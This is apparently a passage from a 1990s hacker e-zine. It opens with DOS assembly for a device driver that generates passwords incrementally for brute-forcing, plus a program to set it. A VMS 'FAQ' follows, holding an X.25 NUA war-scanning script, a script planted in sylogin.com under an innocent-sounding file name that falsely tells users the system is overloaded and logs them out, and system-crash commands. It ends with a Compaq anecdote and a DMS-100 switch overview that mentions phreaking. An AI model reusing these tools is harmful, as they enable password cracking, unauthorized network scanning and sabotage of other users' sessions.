| mov es,bx | |
| mov bx,cs:rh_ofs | |
| mov al,es:[bx]+2 | |
| rol al,1 | |
| mov di,offset cmdtab | |
| xor ah,ah | |
| add di,ax | |
| jmp word ptr[di] | |
| cmdtab: ;command table | |
| dw init ;0 | |
| dw exit3 ;1 | |
| dw exit3 ;2 | |
| dw ioctl_read ;3 | |
| dw do_read ;4 | |
| dw exit3 ;5 | |
| dw exit3 ;6 | |
| dw exit3 ;7 | |
| dw exit3 ;8 | |
| dw exit3 ;9 | |
| dw exit3 ;10 | |
| dw exit3 ;11 | |
| dw ioctl_write ;12 | |
| dw exit3 ;13 | |
| dw 5 dup (offset exit3) | |
| ioctl_read: | |
| push es | |
| push bx | |
| mov si,es:[bx+10h] | |
| mov di,es:[bx+0eh] | |
| mov es,si | |
| push cs | |
| pop ds | |
| mov si,offset number | |
| xor cx,cx | |
| get_char: | |
| lodsb | |
| stosb | |
| inc cl | |
| cmp al,0ah | |
| jz ioctl_rend | |
| jmp get_char | |
| ioctl_rend: | |
| pop bx | |
| pop es | |
| mov es:[bx+012h],cx | |
| mov cs:countr,offset number | |
| jmp exit2 | |
| ioctl_write: | |
| push es | |
| push bx | |
| mov si,es:[bx+010h] | |
| mov ds,si | |
| mov si,es:[bx+0eh] | |
| mov cx,numsize+1 ;es:[bx+012h] | |
| push cs | |
| pop es | |
| mov di,offset number | |
| repe movsb | |
| pop es | |
| pop bx | |
| mov cs:countr,offset number | |
| jmp exit2 | |
| do_read: | |
| push es | |
| push bx | |
| push cs | |
| pop ds | |
| mov si,[countr] | |
| inc si ;word ptr [countr] | |
| cmp si,offset afternum | |
| jnz is_okay | |
| mov si,offset number | |
| call inc_num | |
| is_okay: | |
| mov [countr],si | |
| mov di,es:[bx]+0eh | |
| mov ax,es:[bx]+010h | |
| mov cx, es:[bx]+012h | |
| jcxz clean_up | |
| mov es,ax | |
| repe movsb | |
| clean_up: | |
| pop bx | |
| pop es | |
| jmp exit2 | |
| exit3: mov es:word ptr 3[bx],08103h | |
| jmp exit1 | |
| exit2: | |
| mov es:word ptr 3[bx],0100h | |
| exit1: | |
| pop si | |
| pop di | |
| pop dx | |
| pop cx | |
| pop bx | |
| pop ax | |
| pop es | |
| pop ds | |
| popf | |
| retf | |
| exit: | |
| inc_num proc near | |
| push si | |
| mov si,numsize | |
| reiterate: | |
| inc byte ptr [number+si] | |
| cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range | |
| jnz _exit | |
| mov byte ptr [number+si],'a' ;starting char. in range | |
| dec si | |
| cmp si,-1 | |
| jnz reiterate | |
| mov byte ptr [number],01ah ;send EOF | |
| _exit: | |
| pop si | |
| ret | |
| inc_num endp | |
| at_eof: ; the non-resident code starts here | |
| initial proc near | |
| push es | |
| push cs | |
| pop ds | |
| push cs | |
| pop es | |
| mov si,offset number | |
| mov di,offset tmpnum | |
| cld | |
| _again: | |
| lodsb | |
| cmp al,0ah | |
| jz _nomorechars | |
| stosb | |
| jmp _again | |
| _nomorechars: | |
| mov si,offset msgend | |
| mov cx,4 | |
| repe movsb | |
| mov ah,09 ;print welcome message | |
| mov dx,offset msg1 | |
| int 21h | |
| pop es | |
| ret | |
| initial endp | |
| init: call initial | |
| mov ax,offset at_eof | |
| mov es:[bx]+0eh,ax | |
| push cs | |
| pop ax | |
| mov es:[bx]+010h,ax | |
| mov cs:word ptr cmdtab,offset exit3 | |
| jmp exit2 | |
| msg1 db "Incremental Password Generator (c)1995",0ah,0dh | |
| db "Written by Uncle Armpit",0ah,0dh,0ah,0dh | |
| db "Starting at word [" | |
| tmpnum db 10 dup (?) | |
| msgend db "]",0a,0d,'$' | |
| ;END hackdrv.sys | |
| ;------------------------------cut here---------------------------------- | |
| ;PROGRAM modpwd.asm | |
| ; | |
| org 0100h | |
| mov ax,03d02h | |
| xor cx,cx | |
| mov dx,offset devname | |
| int 21h | |
| jnc drvr_found | |
| mov ah,09 | |
| mov dx,offset no_drvr | |
| int 21h | |
| jmp error_pass | |
| drvr_found: | |
| mov bx,ax | |
| mov ax,04402h | |
| mov cx,20 ;read 20 characters | |
| mov dx,offset databuffr | |
| int 21h | |
| mov pass_len,al | |
| dec al | |
| mov ah,al | |
| and al,0fh | |
| mov cl,4 | |
| shr ah,cl | |
| add ax,03030h | |
| cmp al,'9' | |
| jbe inrange | |
| add al,7 | |
| inrange: | |
| cmp ah,'9' | |
| jbe inrange1 | |
| add ah,7 | |
| inrange1: | |
| mov byte ptr [num_chr],ah | |
| mov byte ptr [num_chr+1],al | |
| cld | |
| mov di,offset databuffr-1 | |
| xor cx,cx | |
| mov cl,pass_len | |
| add di,cx | |
| mov si,offset pass_end | |
| mov cx,stringsz | |
| repe movsb | |
| ;check for information in command line | |
| ;else--> prompt for user input | |
| mov al,pass_len | |
| or byte ptr [0080h],0 | |
| jz req_input | |
| mov cl,[0080h] | |
| dec cl | |
| mov [0081h],cl | |
| mov si,0081h | |
| mov di,offset newpass | |
| mov cx,20 | |
| repe movsb | |
| jmp vrfy_info | |
| req_input: | |
| mov ah,09 | |
| mov dx,offset cur_pass | |
| int 21h | |
| mov ah,0a | |
| mov dx,offset pass_len | |
| int 21h | |
| vrfy_info: | |
| mov ax,word ptr [pass_len] | |
| cmp ah,0 | |
| jz error_pass | |
| dec al | |
| cmp ah,al | |
| jnz error_len | |
| ;change the current password | |
| xor cx,cx | |
| mov cl,al | |
| mov ah,044h | |
| mov al,03 | |
| mov dx,offset newpass+1 | |
| int 21h | |
| jnc success_pass | |
| error_len: | |
| mov ah,09 | |
| mov dx,offset errormsg | |
| int 21h | |
| error_pass: | |
| mov ax,04c01h ;abnormal termination | |
| int 21h | |
| success_pass: | |
| mov ax,04c00h | |
| int 21h | |
| devhandle dw ? | |
| cur_pass db 'Current password is [' | |
| databuffr db 20 dup (?) | |
| pass_end db '] ;' | |
| num_chr db ' ' | |
| db ' characters',0ah,0dh,0ah,0dh | |
| prompt db 'New word: ','$' | |
| stringsz equ $ - pass_end | |
| pass_len db 00 | |
| newpass db 20 dup (?) | |
| errormsg db 'error changing password!',0ah,0dh,'$' | |
| no_drvr db 'Error: ' | |
| devname db "HACKPWD ",00 | |
| db 'device driver not loaded!',0ah,0dh,07,'$' | |
| ------------------------------------------------------------------------------ | |
| -- Frequently & Rarely asked questions about VMS -- part one | |
| by Opticon the Disassembled - UPi | |
| [1] | |
| " I have a kropotkin.hlp file. What could I possibly do with it ? " | |
| $ library /insert /help sys$help:helplib.hlb kropotkin.hlp | |
| . | |
| . | |
| . | |
| $ help kropotkin | |
| [2] | |
| " I have a bakunin.tlb file. What to do with it ? " | |
| $ library /extract=(*) bakunin.tlb | |
| . | |
| . | |
| . | |
| $ dir | |
| [3] | |
| " I would like to have a look at prunton.dat. " | |
| $ dump [/block=(count:x)] prunton.dat | |
| Where "x" is the number of blocks DUMP will display. | |
| [4] | |
| " How can I use an external editor with mail ? " | |
| $ mail :== mail /edit=(send,reply=extract,forward) | |
| [5] | |
| " How a HELP file is organized ? " | |
| $ create example.hlp | |
| 1 EXAMPLE | |
| THIS IS AN EXAMPLE. | |
| 2 MORE_EXAMPLES | |
| MORE EXAMPLES. | |
| 3 EVEN_MORE_EXAMPLES | |
| EVEN MORE EXAMPLES. | |
| <CTRL-Z> | |
| [6] | |
| " How can I have a look at queues ? " | |
| $ show queue smtp /all/full | |
| or | |
| $ show queue /batch/all/full | |
| or | |
| $ show queue /all/full | |
| [7] | |
| " My mail is holded, for some reason, in the SMTP queue... " | |
| Either | |
| $ delete /entry=XXX | |
| or | |
| $ set entry XXX /release | |
| in order to force VMS to release it right away. | |
| [8] | |
| " How do I have a look at DTE and circuits available. " | |
| $ mc ncp show known dte | |
| and | |
| $ mc ncp show known circuits | |
| You may also may find of interest: | |
| $ mc ncp show known networks | |
| $ mc ncp show known lines | |
| $ mc ncp show known destinations | |
| [9] | |
| " I need a NUA scanner for VMS. " | |
| $ OPEN/READ VALUES SCAN.VAL | |
| $ READ VALUES PRE | |
| $ READ VALUES DTE | |
| $ READ VALUES END | |
| $ CLOSE VALUES | |
| $ LOG = "SCAN.LIS" | |
| $ TMP = "SCAN.TMP" | |
| $ OPEN/WRITE FILE 'LOG | |
| $ WRITE FILE "PREFIX:",PRE | |
| $ WRITE FILE "START :",DTE | |
| $ WRITE FILE "LAST :",END | |
| $LOOP: | |
| $ ON ERROR THEN GOTO OPEN | |
| $ SPAWN/NOWAIT/OUTPUT='TMP' SET HOST/X29 'PRE''DTE' | |
| $ WAIT 00:00:06 | |
| $ SPAWN_NAME = F$GETJPI("","USERNAME") | |
| $ SPAWN_NAME = F$EXTRACT(0,F$LOC(" ",SPAWN_NAME),SPAWN_NAME) + "_" | |
| $ CONTEXT = "" | |
| $FIND_PROC: | |
| $ PID = F$PID(CONTEXT) | |
| $ IF PID .EQS. "" THEN GOTO OPEN | |
| $ IF F$LOC(SPAWN_NAME,F$GETJPI(PID,"PRCNAM")) .EQ. 0 THEN STOP/ID='PID | |
| $ GOTO FIND_PROC | |
| $OPEN: | |
| $ ON ERROR THEN GOTO OPEN | |
| $ OPEN/READ PAD 'TMP | |
| $ MSSG = " Process stopped" | |
| $ ON ERROR THEN GOTO CLOSE | |
| $ READ PAD LINE | |
| $ IF F$LOC("call clear",LINE) .LT. F$LEN(LINE) THEN READ PAD LINE | |
| $ MSSG = F$EXTRACT(F$LOC(",",LINE)+1,80,LINE) | |
| $CLOSE: | |
| $ CLOSE PAD | |
| $ DELETE 'TMP';* | |
| $ IF F$LOC("obtain",MSSG).NE.F$LENGTH(MSSG) THEN GOTO NOCONN | |
| $ WRITE FILE PRE,DTE,MSSG | |
| $NOCONN: | |
| $ DTE = DTE + 1 | |
| $ IF DTE .LE. END THEN GOTO LOOP | |
| $ CLOSE FILE | |
| ( I don't have a clue by whom the code was written. ) | |
| then | |
| $ create scan.val | |
| prefix | |
| starting_NUA | |
| ending_NUA | |
| <CTRL-Z> | |
| $ submit /noprint scan.com | |
| . | |
| . | |
| . | |
| $ search scan.lis "call connected" | |
| [10] | |
| " How do I crash a VAX !? " | |
| $ set default sys$system | |
| $ @shutdown | |
| or | |
| $ set default sys$system | |
| $ run opccrash | |
| [11] | |
| " I have a dostogiefski.cld file; what do I do with it ? " | |
| $ set command dostogiefski.cld | |
| [12] | |
| " Can I send messages to interactive processes ? " | |
| $ reply [/user=username] [/bell] [/id=xxxx] " Carlos Marigella " | |
| [13] | |
| " How can I prevent someone from phoning me all the time ? " | |
| $ set broadcast=(nophone) | |
| [14] | |
| " Can I postpone/disable interactive logins ? " | |
| $ set logins /interactive=0 | |
| $ set logins /interactive | |
| will display current value. | |
| Under the same `logic' : | |
| $ create innocent_filename.com | |
| $ set nocontrol | |
| $ context = "" | |
| $ pid = F$PID(context) | |
| $ user_name = F$GETJPI(pid,"username") | |
| $ wait 00:01:00.00 | |
| $ write sys$output "" | |
| $ write sys$output " System overloaded; please try again later " | |
| $ write sys$output " Logging out process ''pid', of user ''user_name' " | |
| $ write sys$output "" | |
| $ logout /full | |
| Add either to sys$system:sylogin.com or sys$login:login.com the following: | |
| " $ @innocent_filename.com ". | |
| [15] | |
| " How can I modify the welcome file ? Where is it held ? " | |
| $ set default sys$system | |
| $ edit welcome.txt | |
| [16] | |
| " I am editing a huge text file. How can I reach the end of it ? " | |
| at the editor's prompt type: | |
| *find end | |
| or | |
| *find "search string" | |
| [17] | |
| " How can I be sure than noone is watching me from a hidden process ? " | |
| $ show system /process | |
| VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:41.94 Uptime 2 03:05:25 | |
| Pid Process Name State Pri I/O CPU Page flts Ph.Mem | |
| . | |
| . | |
| . | |
| 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 | |
| 00000117 SMTP_SYMBIONT HIB 4 33398 0 00:16:49.67 246104 426 | |
| 00000118 SYMBIONT_6 HIB 4 47868 0 00:05:09.01 296 121 | |
| 00001255 SYMBIONT_0001 CUR 13 15 64293 0 00:05:08.12 1982 248 | |
| $ show system /full | |
| VAX/VMS V5.5-2 on node STIRNER 30-MAR-1937 02:10:59.64 Uptime 2 03:05:43 | |
| Pid Process Name State Pri I/O CPU Page flts Ph.Mem | |
| . | |
| . | |
| . | |
| 00000114 SYMBIONT_4 HIB 5 290 0 00:00:19.05 1650 47 | |
| [1,4] | |
| 00000117 SMTP_SYMBIONT LEF 5 33407 0 00:16:49.78 246116 502 | |
| [1,4] | |
| 00000118 SYMBIONT_6 HIB 5 47872 0 00:05:09.03 296 121 | |
| [1,4] | |
| 00001255 SYMBIONT_0001 CUR 13 15 64348 0 00:05:09.60 2063 268 | |
| [1,4] | |
| $ | |
| See the difference between system's SYMBIONT processes ( i.e. SYMBIONT_4, | |
| SYMBIONT_6, SMTP_SYMBIONT ) and the one created by using a `stealth' program | |
| ( SYMBIONT_0001 ); the names and the User Identification Codes may vary, but | |
| state, priority, physical memory used, page faults, input/output and Process | |
| IDentification numbers, can reveal, in combination, such a nastyness. | |
| Afterwards you may " show process /id=xxxx /continuous ", | |
| or " stop /id=xxxx ". | |
| [18] | |
| " Can I view the CPU usage of each process ? " | |
| $ monitor processes /topcpu | |
| will display a bar-chart of this kind. | |
| [19] | |
| Run the following .COM file and it will display information you'd | |
| possibly need on an account and/or node. It uses simple lexical functions. | |
| $ output :== write sys$output | |
| $ output "" | |
| $ node_id = F$CSID(context) | |
| $ nodename = F$GETSYI("nodename",,node_id) | |
| $ if F$GETSYI("cluster_member") .EQS. "TRUE" | |
| $ then output " ''nodename' is a member of a cluster. " | |
| $ else output " ''nodename' is not a member of a cluster. " | |
| $ context = "" | |
| $ username = F$GETJPI("","username") | |
| $ output " Username : ''username' " | |
| $ group = F$GETJPI("","grp") | |
| $ output " Group : ''group' " | |
| $ uic = F$USER() | |
| $ output " User Identification Code : ''uic' " | |
| $ pid = F$PID(context) | |
| $ output " Process IDentification : ''pid' " | |
| $ process = F$PROCESS() | |
| $ output " Process Name : ''process' " | |
| $ terminal = F$GETJPI("","terminal") | |
| $ output " Terminal Name : ''terminal' " | |
| $ priority = F$GETJPI("","authpri") | |
| $ output " Authorized Priority : ''priority' " | |
| $ maxjobs = F$GETJPI("","maxjobs") | |
| $ output " Maximum Number of Processes Allowed : ''maxjobs' " | |
| $ authpriv = F$GETJPI("","authpriv") | |
| $ output " Authorized Privileges : ''authpriv' " | |
| $ curpriv = F$GETJPI("","curpriv") | |
| $ output " Current Privileges : ''curpriv' " | |
| $ directory = F$DIRECTORY() | |
| $ output " Directory : ''directory' " | |
| $ protection = F$ENVIRONMENT("protection") | |
| $ output " Protection : ''protection' " | |
| $ boottime = F$GETSYI("boottime") | |
| $ output " Boot Time : ''boottime' " | |
| $ time = F$TIME() | |
| $ output " Current Time : ''time' " | |
| $ version = F$GETSYI("version") | |
| $ output " VMS version : ''version' " | |
| $ output "" | |
| You may : | |
| $ library /extract=(lexicals) /output=lexicals.hlp sys$help:helplib.hlb | |
| and then transfer lexicals.hlp. | |
| [20] | |
| " How can I view/modify my disk quota limit ? " | |
| DiskQuota was a standalone utility in versions prior to five; It is now | |
| a subset of the System Management utility, and thus you should : | |
| $ set def sys$system | |
| $ run sysman | |
| SYSMAN> diskquota show /device=dua1: [1,1] | |
| %SYSMAN-I-QUOTA, disk quota statistics on device DUA1: -- | |
| Node | |
| UIC Usage Permanent Quota Overdraft Limit | |
| [1,1] 123456 1500000 100 | |
| SYSMAN> diskquota modify /device=dua1: [1,1] /permquota=654321 /overdraft=1000 | |
| [END] | |
| Post Scriptum | |
| Some operations require privileges. | |
| ------------------------------------------------------------------------------ | |
| Compaq CEO blunders on TV | |
| Compaq CEO Eckard Pfeiffer last week visited The Netherlands | |
| to do some pr work. During a television interview for NOVA, | |
| a well known news show that aired last Friday, Pfeiffer | |
| claimed that pc's were easy to use, and could be used by | |
| virtually anyone. So, the reporter asked him to switch the | |
| tv channel on a Presario that was next to Pfeiffer that ran | |
| a Windows-based TV tuner. The result was Pfeifer frantically | |
| clicking on several menu bars, but instead of switching | |
| channels, he exited the program altogether. To make things | |
| worse, the reporter next asked him to start up a word | |
| processor. Again, Pfeiffer, clicked his way around the | |
| desktop, but couldn't find nor start the program. Finally, | |
| he was asked to start up a game. You saw Pfeifer (now in | |
| deep trouble) clicking on all the tabs of the "easy to use" | |
| tab-works interface that is included on all Presario's, | |
| looking for games, while muttering "Were are ze games? I | |
| can't find ze games on zis machine!!!", his accent becoming | |
| increasingly more German then before. It was almost like Dr. | |
| Strangelove. The last shot is of a Compaq tech support guy, | |
| rushing in to help him out.... So much for ease of use.... | |
| Voorburgwal 129, 1012 EP | |
| Amsterdam, The Netherlands). | |
| ------------------------------------------------------------------------------ | |
| Ok, I'm going to assume that you already know a little bit about what it | |
| is you're reading. The DMS100/IBN (integrated business network) is | |
| composed of mainly electronic business sets, phones, data units, and | |
| attendant consoles and units, all physically at the customers place of | |
| business. While the digital switching software and support hardware is | |
| located at the Telco. Together, in tandem they work to give the customer | |
| one of the best combinations of features and benefits. The DMS-100 | |
| combines voice AND data in one business comunications package. One of | |
| the many advantages is it offers the use with *any* sized business with | |
| up to 30,000 lines. The IBN system controls most operations, diagnoses | |
| problems, and also has the ability to do limited repairs on itself. | |
| Being modular, it can meet the needs at hand, and have the ability for | |
| new features, as time goes by, while still maintaining a cost-effective | |
| environment. Another advantage is that is uses a central attendant where | |
| and when needed. Along with Call Routing, or CDR, to control and | |
| restrict Long Distnace Calling, and network management. The IBN gives | |
| the user hassle free operation. Northern Telcom's DMS-100 switches, | |
| which by the way are digital, are frequently backed-up by their | |
| *higher trained* personnel, which isnt saying much. Some other features | |
| are: Automatic Routing Selection, or ARS, which routes the long distance | |
| calls, if they are even allowed, over the most economical (right) route | |
| available. Station Message Detail Recording, or SMDR, which basically | |
| does just what its name states, records long distance charges, including | |
| but not limited to, originating number, time and length of call, | |
| authorization code, and others... Yet another capability is the Direct | |
| Inward System Access (DISA), which gives the personnel the ability to use | |
| the system to place long distance calls cheaply, even from outside the | |
| company (sounds like a PBX a bit doesn't it?). | |
| System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys, | |
| each with its associated source AND destination lamp to signify the | |
| status of both the calling and the called party status. The Second | |
| feature is Alpha Numeric Display Multiple Directory Number Feature Keys, | |
| up to 42 of them, which can be used for a Paging System, or speed | |
| dialing, and things along those lines. A third feature is the release | |
| Source/Release Destination Console, which features access to paging. | |
| Other features which mainly are unimportant I will list here, they are: | |
| Call Identifier Exclude Source/Exclude Destination. Remote Console Call | |
| Destination. Signal Source.Signal Destination. Call Holding. Call | |
| Detail Entry. Remote Console Call Selection. Console Display. Camp-on | |
| Automatic Recall Conference. A 6 port 2 way splitting non-delayed | |
| operation. Busy Verification of Lines. Manual and Automatic Hold. | |
| Multiple Console OPeration. Busy verification of trunks. Switched Loop | |
| Operation. Trunk Group Busy Indication. Uniform Call distribution form | |
| queue. Multiple listed directory numbers. Control of trunk group | |
| access. Secrecy. Night Service. Serial call. Speed Calling. Lockout. | |
| Delayed Operation. Position Busy. Interposition Calling. THrough Call | |
| Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed | |
| Call. Call Transfer/Conference. On-Hook Dialing. Additional | |
| Programmable Features include automatic hold. Listem-on hold. Multiple | |
| Appearance Directory Numbers, or MADN. Single Call Arrangement. | |
| Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume | |
| Control. Call Waiting. Stored Number Redial. Private Business Line. | |
| And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be | |
| used as a "standalone" or can be attached to the business set or other | |
| phone type unit. It has the ability to transmit over a two wire loop, at | |
| speeds of up to 56 kb per second, using a proprietary time compression | |
| multiplexing technology. The DMS100 is also available in different | |
| models to suit existing terminal capacities. It also provides integrated | |
| voice/data, that right data, communications. They, the phone company, | |
| and data unit, can operate together, simultaniously, or even independant | |
| of one another. Being fully digitized, it was one if the first switches | |
| to eliminate the use of those dinosaur analog modems (for which i still | |
| have a few if anyone wants to buy em off me or give me shipping money and | |
| ill send em to ya free). Well thats it for now. This should give you a | |
| good understanding of the capabilities of one of the many switches in use | |
| today. In fact, although outdated somewhat, my telco, citizens | |
| utilities, and one in stockton from what i just found out, is still using | |
| this switch (poor me in elk grove, ca eh?) | |
| which makes phreaking quite an easy task, not that it was really ever | |
| hard but anything to make it easier help. ANyway, if you have any | |
| comments/flames/general bullshit, mail it to either | |
| jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a | |
| last resort email address. | |
| ciao | |
| ---Captain Hook | |
| ------------------------------------------------------------------------------ |